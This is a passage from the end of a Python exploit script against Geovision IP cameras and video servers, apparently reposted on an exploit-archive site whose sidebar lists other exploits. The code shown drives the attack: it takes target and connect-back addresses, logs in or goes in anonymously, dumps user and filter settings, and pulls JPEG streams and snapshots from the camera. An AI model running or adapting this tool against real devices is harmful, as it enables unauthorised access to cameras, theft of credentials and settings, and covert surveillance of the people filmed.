#
# Validation done, start print out stuff to the user
#
    if args.https:
        print "[i] HTTPS / SSL Mode Selected"
    print "[i] Remote target IP:",rhost
    print "[i] Remote target PORT:",rport
    if not args.geotoken and not args.dump and not args.deviceinfo:
        print "[i] Connect back IP:",lhost
        print "[i] Connect back PORT:",lport
 
    rhost = rhost + ':' + rport
 
 
    headers = {
        'Connection': 'close',
        'Content-Type'  :   'application/x-www-form-urlencoded',
        'Accept'    :   'gzip, deflate',
        'Accept-Language'   :   'en-US,en;q=0.8',
        'Cache-Control' :   'max-age=0',
        'User-Agent':'Mozilla'
        }
 
    # Print Model and Firmware version
    Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo()
    if deviceinfo:
        sys.exit(0)
 
 
    # Geovision token login within the function
    #
    if GEOtoken:
        Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo()
        if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).GeoToken():
            print "[!] Failed"
            sys.exit(1)
        else:
            sys.exit(0)
 
 
    if anonymous:
        if jpegstream:
            if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
                print "[!] Failed"
                sys.exit(0)
        elif picturecatch:
            if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
                print "[!] Failed"
                sys.exit(0)
        else:
            print "[!] Needed: --anonymous [--picturecatch | --jpegstream]"
            sys.exit(1)
 
    else:
        #
        # Geovision Login needed
        #
        if usersetting:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).UserSetting(DumpSettings):
                    print "[!] Failed"
                    sys.exit(0)
        elif filtersetting:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).FilterSetting():
                    print "[!] Failed"
                    sys.exit(0)
        elif jpegstream:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
                    print "[!] Failed"
                    sys.exit(0)
        elif picturecatch:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
                    print "[!] Failed"
                    sys.exit(0)
        else:
            print "[!] Needed: --usersetting | --jpegstream | --picturecatch | --filtersetting"
            sys.exit(1)
 
    sys.exit(0)
#
# [EOF]
#
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Cisco ASA - Crash PoC
·Geovision Inc. IP Camera/Video
·Hava Tahmin 1.0 Database Discl
·Hazir Site 2.2 Database Disclo
·Gateway 1.0 Database Disclosur
·iPortalx Portal Scripti Databa
·BOCHS 2.6-5 - Buffer Overflow
·MalwareFox AntiMalware 2.74.0.
·WordPress Core - 'load-scripts
·Online Voting System - Authent
·MS17-010 EternalRomance / Eter
·Apport / ABRT chroot Privilege
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved